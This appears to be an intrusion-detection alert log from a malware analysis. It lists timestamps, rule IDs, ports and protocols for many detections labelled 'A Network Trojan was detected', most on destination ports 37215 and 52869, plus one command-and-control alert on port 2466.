                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.686210+0200
                      SID:2027339
                      Source Port:44764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.349447+0200
                      SID:2835222
                      Source Port:40416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.868951+0200
                      SID:2835222
                      Source Port:46084
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:48.865590+0200
                      SID:2835222
                      Source Port:49572
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:45.460570+0200
                      SID:2835222
                      Source Port:56478
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.673041+0200
                      SID:2835222
                      Source Port:60838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.686210+0200
                      SID:2027339
                      Source Port:48346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.363294+0200
                      SID:2835222
                      Source Port:49816
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872953+0200
                      SID:2835222
                      Source Port:52494
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.591367+0200
                      SID:2027339
                      Source Port:51654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.666649+0200
                      SID:2835222
                      Source Port:44232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.648285+0200
                      SID:2027339
                      Source Port:52340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.340522+0200
                      SID:2835222
                      Source Port:36342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872982+0200
                      SID:2835222
                      Source Port:59950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:51.745940+0200
                      SID:2835222
                      Source Port:44070
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354743+0200
                      SID:2835222
                      Source Port:41766
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.675714+0200
                      SID:2027339
                      Source Port:36992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:52.614051+0200
                      SID:2027339
                      Source Port:47904
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.676145+0200
                      SID:2835222
                      Source Port:55504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.865110+0200
                      SID:2835222
                      Source Port:49380
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.334366+0200
                      SID:2835222
                      Source Port:56188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.675714+0200
                      SID:2027339
                      Source Port:51636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.363903+0200
                      SID:2835222
                      Source Port:32932
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.606405+0200
                      SID:2027339
                      Source Port:47354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.706701+0200
                      SID:2027339
                      Source Port:44166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.871918+0200
                      SID:2835222
                      Source Port:46190
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.670999+0200
                      SID:2835222
                      Source Port:38920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:44.673284+0200
                      SID:2027339
                      Source Port:34506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.359675+0200
                      SID:2835222
                      Source Port:50016
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.685966+0200
                      SID:2027339
                      Source Port:49236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.673041+0200
                      SID:2835222
                      Source Port:46882
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:42.145992+0200
                      SID:2835222
                      Source Port:45536
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.859645+0200
                      SID:2835222
                      Source Port:59386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.356816+0200
                      SID:2835222
                      Source Port:55064
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.673041+0200
                      SID:2835222
                      Source Port:36180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:52.655576+0200
                      SID:2027339
                      Source Port:37108
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.682964+0200
                      SID:2835222
                      Source Port:38548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872953+0200
                      SID:2835222
                      Source Port:57274
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.682964+0200
                      SID:2835222
                      Source Port:37482
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.613649+0200
                      SID:2027339
                      Source Port:52564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.871918+0200
                      SID:2835222
                      Source Port:33132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.865440+0200
                      SID:2835222
                      Source Port:50818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354140+0200
                      SID:2835222
                      Source Port:48596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.485425+0200
                      SID:2027339
                      Source Port:48002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:40.490930+0200
                      SID:2027339
                      Source Port:51864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.858846+0200
                      SID:2835222
                      Source Port:36174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.616913+0200
                      SID:2835222
                      Source Port:44546
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.645873+0200
                      SID:2027339
                      Source Port:35832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.359784+0200
                      SID:2835222
                      Source Port:40056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.359675+0200
                      SID:2835222
                      Source Port:44436
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:40.388443+0200
                      SID:2027339
                      Source Port:47364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.863434+0200
                      SID:2835222
                      Source Port:56364
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.555197+0200
                      SID:2835222
                      Source Port:45060
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.859645+0200
                      SID:2835222
                      Source Port:41334
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.485425+0200
                      SID:2027339
                      Source Port:56136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.686210+0200
                      SID:2027339
                      Source Port:40116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.346416+0200
                      SID:2835222
                      Source Port:52902
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.550808+0200
                      SID:2835222
                      Source Port:41582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872953+0200
                      SID:2835222
                      Source Port:55246
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.566372+0200
                      SID:2027339
                      Source Port:36388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.534770+0200
                      SID:2027339
                      Source Port:52054
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.693492+0200
                      SID:2027339
                      Source Port:50522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.334366+0200
                      SID:2835222
                      Source Port:38498
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.706701+0200
                      SID:2027339
                      Source Port:47740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.871999+0200
                      SID:2835222
                      Source Port:55596
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.685966+0200
                      SID:2027339
                      Source Port:57934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:45.480765+0200
                      SID:2835222
                      Source Port:40974
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.716310+0200
                      SID:2027339
                      Source Port:55562
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.706701+0200
                      SID:2027339
                      Source Port:48554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.338393+0200
                      SID:2835222
                      Source Port:34374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.670904+0200
                      SID:2835222
                      Source Port:33732
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.566372+0200
                      SID:2027339
                      Source Port:39888
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.566372+0200
                      SID:2027339
                      Source Port:49076
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:52.581630+0200
                      SID:2027339
                      Source Port:53362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.866260+0200
                      SID:2835222
                      Source Port:53550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:45.480765+0200
                      SID:2835222
                      Source Port:44328
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.534770+0200
                      SID:2027339
                      Source Port:50064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.675714+0200
                      SID:2027339
                      Source Port:35096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872000+0200
                      SID:2835222
                      Source Port:39246
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.695376+0200
                      SID:2027339
                      Source Port:58296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872953+0200
                      SID:2835222
                      Source Port:49362
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.865484+0200
                      SID:2835222
                      Source Port:55046
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.549825+0200
                      SID:2835222
                      Source Port:41124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.613649+0200
                      SID:2027339
                      Source Port:42678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:38.610030+0200
                      SID:2027339
                      Source Port:41646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354373+0200
                      SID:2835222
                      Source Port:56294
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.611583+0200
                      SID:2027339
                      Source Port:57214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.656252+0200
                      SID:2027339
                      Source Port:47092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.686210+0200
                      SID:2027339
                      Source Port:49242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.356816+0200
                      SID:2835222
                      Source Port:60568
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354140+0200
                      SID:2835222
                      Source Port:55278
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.674515+0200
                      SID:2835222
                      Source Port:49742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.645873+0200
                      SID:2027339
                      Source Port:37522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.566372+0200
                      SID:2027339
                      Source Port:35188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:48.937448+0200
                      SID:2835222
                      Source Port:35336
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:48.935408+0200
                      SID:2835222
                      Source Port:32884
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.332387+0200
                      SID:2835222
                      Source Port:46556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.679255+0200
                      SID:2835222
                      Source Port:39506
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354140+0200
                      SID:2835222
                      Source Port:42040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.872953+0200
                      SID:2835222
                      Source Port:46556
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.658684+0200
                      SID:2835222
                      Source Port:39756
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.632661+0200
                      SID:2027339
                      Source Port:39614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.346416+0200
                      SID:2835222
                      Source Port:51348
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.343632+0200
                      SID:2835222
                      Source Port:38410
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.359785+0200
                      SID:2835222
                      Source Port:59796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:40.451545+0200
                      SID:2027339
                      Source Port:46778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:39.705937+0200
                      SID:2835222
                      Source Port:58152
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:48.937449+0200
                      SID:2835222
                      Source Port:59856
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.669936+0200
                      SID:2835222
                      Source Port:52616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.547499+0200
                      SID:2027339
                      Source Port:50678
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.360018+0200
                      SID:2835222
                      Source Port:52214
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.675355+0200
                      SID:2027339
                      Source Port:54550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:42.296632+0200
                      SID:2835222
                      Source Port:40924
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.695781+0200
                      SID:2027339
                      Source Port:52566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:52.571724+0200
                      SID:2027339
                      Source Port:39178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.664967+0200
                      SID:2027339
                      Source Port:53122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:52.685424+0200
                      SID:2027339
                      Source Port:34052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.606405+0200
                      SID:2027339
                      Source Port:51004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.346416+0200
                      SID:2835222
                      Source Port:57268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.485425+0200
                      SID:2027339
                      Source Port:57206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.870526+0200
                      SID:2835222
                      Source Port:54542
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:52.591717+0200
                      SID:2027339
                      Source Port:40400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.868951+0200
                      SID:2835222
                      Source Port:56582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.675714+0200
                      SID:2027339
                      Source Port:35702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:39.114849+0200
                      SID:2835222
                      Source Port:57368
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.611583+0200
                      SID:2027339
                      Source Port:52460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.863434+0200
                      SID:2835222
                      Source Port:54782
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.658684+0200
                      SID:2835222
                      Source Port:51668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.359675+0200
                      SID:2835222
                      Source Port:52330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.462009+0200
                      SID:2027339
                      Source Port:36296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.658684+0200
                      SID:2835222
                      Source Port:43456
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:47.142619+0200
                      SID:2835222
                      Source Port:48316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.871918+0200
                      SID:2835222
                      Source Port:43320
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.352367+0200
                      SID:2835222
                      Source Port:48816
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.664968+0200
                      SID:2027339
                      Source Port:44760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.566372+0200
                      SID:2027339
                      Source Port:58876
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.611583+0200
                      SID:2027339
                      Source Port:44440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.684902+0200
                      SID:2835222
                      Source Port:33088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.343632+0200
                      SID:2835222
                      Source Port:44130
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.863376+0200
                      SID:2027339
                      Source Port:49312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.354140+0200
                      SID:2835222
                      Source Port:60530
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.695376+0200
                      SID:2027339
                      Source Port:48974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.686210+0200
                      SID:2027339
                      Source Port:45206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:52.616927+0200
                      SID:2027339
                      Source Port:49400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.871918+0200
                      SID:2835222
                      Source Port:41892
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:40.403015+0200
                      SID:2027339
                      Source Port:36836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:47.061515+0200
                      SID:2835222
                      Source Port:40044
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.693492+0200
                      SID:2027339
                      Source Port:60172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.706701+0200
                      SID:2027339
                      Source Port:48860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.004037+0200
                      SID:2835222
                      Source Port:44942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.645873+0200
                      SID:2027339
                      Source Port:38978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.547499+0200
                      SID:2027339
                      Source Port:55180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.656252+0200
                      SID:2027339
                      Source Port:50870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.670731+0200
                      SID:2835222
                      Source Port:57654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.670904+0200
                      SID:2835222
                      Source Port:38972
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.671000+0200
                      SID:2835222
                      Source Port:53578
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.356816+0200
                      SID:2835222
                      Source Port:43252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.656252+0200
                      SID:2027339
                      Source Port:52222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:45.383849+0200
                      SID:2835222
                      Source Port:35720
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.716310+0200
                      SID:2027339
                      Source Port:54514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.670904+0200
                      SID:2835222
                      Source Port:49302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:34.673041+0200
                      SID:2835222
                      Source Port:37552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.675714+0200
                      SID:2027339
                      Source Port:55692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:36.338393+0200
                      SID:2835222
                      Source Port:32874
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:52.613580+0200
                      SID:2027339
                      Source Port:42240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:33.868951+0200
                      SID:2835222
                      Source Port:53782
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.695781+0200
                      SID:2027339
                      Source Port:34264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:38.956391+0200
                      SID:2835222
                      Source Port:59048
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.804118+0200
                      SID:2027339
                      Source Port:58012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.664967+0200
                      SID:2027339
                      Source Port:52986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:47.331187+0200
                      SID:2030490
                      Source Port:46914
                      Destination Port:2466
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-20T23:05:36.060906+0200
                      SID:2027339
                      Source Port:55966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:37.686210+0200
                      SID:2027339
                      Source Port:55200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:05:52.600203+0200
                      SID:2027339
                      Source Port:56114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
